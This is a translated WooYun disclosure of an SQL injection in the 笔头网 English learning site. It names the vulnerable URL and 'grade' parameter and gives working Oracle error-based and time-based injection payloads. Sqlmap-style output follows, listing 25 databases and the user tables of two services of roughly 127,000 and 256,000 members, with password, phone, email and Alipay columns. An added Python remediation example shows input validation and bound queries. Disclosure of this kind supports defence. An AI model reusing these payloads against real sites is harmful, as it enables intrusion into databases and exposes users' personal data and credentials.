笔头网 SQL injection vulnerability (nearly 400,000 users affected)

2016-01-04 22:00

http://denglish.e21.cn/diag/user_myclazz.do;jsessionid=D34619F852B1EF15E0EB4890AA68A335?pageNum=1&pageRows=5&grade=0&bjtype=common

The grade parameter is injectable.

Code area
Parameter: grade (GET)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
Payload: pageNum=1&pageRows=5&grade=0') AND 8844=CTXSYS.DRITHSX.SN(8844,(CHR(113)||CHR(107)||CHR(113)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (8844=8844) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(122)||CHR(98)||CHR(113))) AND ('ibJw'='ibJw&bjtype=common

Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: pageNum=1&pageRows=5&grade=0') AND 2118=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('eRHT'='eRHT&bjtype=common
---
web application technology: JSP
back-end DBMS: Oracle
available databases [25]:
[*] APEX_030200
[*] APPQOSSYS
[*] BITOU
[*] CMS
[*] CTXSYS
[*] DBSNMP
[*] DENGLISH
[*] DENGLISH3
[*] EBOOK
[*] EBOOK1
[*] EXFSYS
[*] FLOWS_030000
[*] FLOWS_FILES
[*] MDSYS
[*] NEW007
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB

Proof of vulnerability:

Code area
back-end DBMS: Oracle
Database: NEW007
+--------+---------+
| Table  | Entries |
+--------+---------+
| T_USER | 126975  |
+--------+---------+

Database: NEW007
Table: T_USER
[32 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| ADDRESS      | VARCHAR2 |
| AMOUNT       | NUMBER   |
| CARD_POINT   | NUMBER   |
| CREDIT       | NUMBER   |
| CRT_DATE     | DATE     |
| CURRENT_HOST | VARCHAR2 |
| EMAIL        | VARCHAR2 |
| GENDER       | VARCHAR2 |
| GRADE        | VARCHAR2 |
| GRADE_ID     | NUMBER   |
| IMAGE        | VARCHAR2 |
| INTRODUCE    | VARCHAR2 |
| LAST_TIME    | DATE     |
| LOGIN_COUT   | NUMBER   |
| LOGIN_NAME   | VARCHAR2 |
| MSN          | VARCHAR2 |
| NOTE         | VARCHAR2 |
| PASSWD       | VARCHAR2 |
| PHONE        | VARCHAR2 |
| PHONE_CHECK  | VARCHAR2 |
| PRIVILEGE    | VARCHAR2 |
| QQ           | VARCHAR2 |
| QQ_OPENID    | VARCHAR2 |
| REGION_ID    | NUMBER   |
| ROLE_ID      | NUMBER   |
| RRUID        | VARCHAR2 |
| SCHOOL_NAME  | VARCHAR2 |
| SINA_UID     | VARCHAR2 |
| STATUS       | VARCHAR2 |
| USER_ID      | NUMBER   |
| USER_NAME    | VARCHAR2 |
| USER_TYPE    | VARCHAR2 |
+--------------+----------+

http://www.penglish.cn/ 笔头网, an intelligent English learning platform, has 256217 members in total.

Code area
back-end DBMS: Oracle
Database: BITOU
+--------+---------+
| Table  | Entries |
+--------+---------+
| T_USER | 256217  |
+--------+---------+

Database: BITOU
Table: T_USER
[51 columns]
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| ADDRESS         | VARCHAR2 |
| ALIPAY          | VARCHAR2 |
| AMOUNT          | NUMBER   |
| BIRTHDAY        | VARCHAR2 |
| BLOG_URL        | VARCHAR2 |
| CARD_POINT      | NUMBER   |
| CET_TYPE        | NUMBER   |
| CHANNEL_ID      | NUMBER   |
| CREDIT          | NUMBER   |
| CRT_DATE        | DATE     |
| CRT_OP          | VARCHAR2 |
| CURRENT_DEV     | VARCHAR2 |
| CURRENT_HOST    | VARCHAR2 |
| DS_PRODUCT_ID   | NUMBER   |
| EMAIL           | VARCHAR2 |
| EXP             | NUMBER   |
| GENDER          | VARCHAR2 |
| GRADE           | VARCHAR2 |
| GRADE_ID        | NUMBER   |
| ID_VALIDATION   | VARCHAR2 |
| IMAGE           | VARCHAR2 |
| INTRODUCE       | VARCHAR2 |
| KY_USE_DAYS     | NUMBER   |
| LAST_TIME       | DATE     |
| LOGIN_COUT      | NUMBER   |
| LOGIN_NAME      | VARCHAR2 |
| MSN             | VARCHAR2 |
| NAME            | VARCHAR2 |
| NOTE            | VARCHAR2 |
| ORG_ID          | NUMBER   |
| PARENT_PASSWORD | VARCHAR2 |
| PASSWD          | VARCHAR2 |
| PHONE           | VARCHAR2 |
| PRIVILEGE       | VARCHAR2 |
| PROMOTE_ID      | NUMBER   |
| PROMOTER_LINK   | VARCHAR2 |
| QQ              | VARCHAR2 |
| REG_FROM        | NUMBER   |
| REG_HOST        | VARCHAR2 |
| REGION_ID       | NUMBER   |
| SCHOOL          | VARCHAR2 |
| STATUS          | VARCHAR2 |
| THIRD_TYPE      | VARCHAR2 |
| THIRD_UID       | VARCHAR2 |
| USE_DAYS        | NUMBER   |
| USE_TIME        | DATE     |
| USER_ID         | NUMBER   |
| USER_NAME       | VARCHAR2 |
| USER_TYPE       | VARCHAR2 |
| VALID_DAYS      | NUMBER   |
| WX_ID           | VARCHAR2 |
+-----------------+----------+


Remediation:
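
Added example, not part of the original report or the site's code: allow-list validation of the four query parameters seen in the request URL, followed by a bound query so that a value shaped like the `grade` payloads above is handled as data rather than SQL. The parameter rules, the `T_CLAZZ` table and the SQLite stand-in for Oracle are assumptions.

```python
import re
import sqlite3
from urllib.parse import urlsplit, parse_qs

# Assumed contract for user_myclazz.do, inferred from the request URL in the
# report; the application's real rules are not shown there.
RULES = {
    "pageNum": re.compile(r"[1-9]\d{0,5}"),
    "pageRows": re.compile(r"[1-9]\d{0,2}"),
    "grade": re.compile(r"\d{1,2}"),
    "bjtype": re.compile(r"[a-z]{1,16}"),
}

def violations(url):
    """Return (parameter, reason) pairs; an empty list means the request conforms."""
    found = []
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for name, values in params.items():
        if name not in RULES:
            found.append((name, "unexpected parameter"))
        elif len(values) != 1:
            found.append((name, "repeated parameter"))
        elif not RULES[name].fullmatch(values[0]):
            found.append((name, "value outside allow-list"))
    return sorted(found)

def classes_for_grade(conn, grade):
    """Bind the value instead of concatenating it into the SQL text."""
    # T_CLAZZ and its columns are hypothetical; with Oracle JDBC the same
    # binding is done through PreparedStatement.setString().
    sql = "SELECT NAME FROM T_CLAZZ WHERE (GRADE = ?) ORDER BY NAME"
    return [row[0] for row in conn.execute(sql, (grade,))]

def demo_db():
    """Constructed in-memory stand-in for the Oracle schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE T_CLAZZ (NAME TEXT, GRADE TEXT)")
    conn.executemany("INSERT INTO T_CLAZZ VALUES (?, ?)",
                     [("Class A", "0"), ("Class B", "0"), ("Class C", "7")])
    return conn

if __name__ == "__main__":
    base = ("http://denglish.e21.cn/diag/user_myclazz.do"
            "?pageNum=1&pageRows=5&bjtype=common&grade=")
    # Second value is constructed from the quote/parenthesis wrapper of the report's payloads.
    for grade in ("0", "0') AND ('eRHT'='eRHT"):
        print(repr(grade), violations(base + grade), classes_for_grade(demo_db(), grade))
```

Validation rejects the request before it reaches the database; the bound query is the control that still holds if a rule is too loose or a parameter is missed.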

Source: www.wooyun.org/bugs/wooyun-2016-0157774
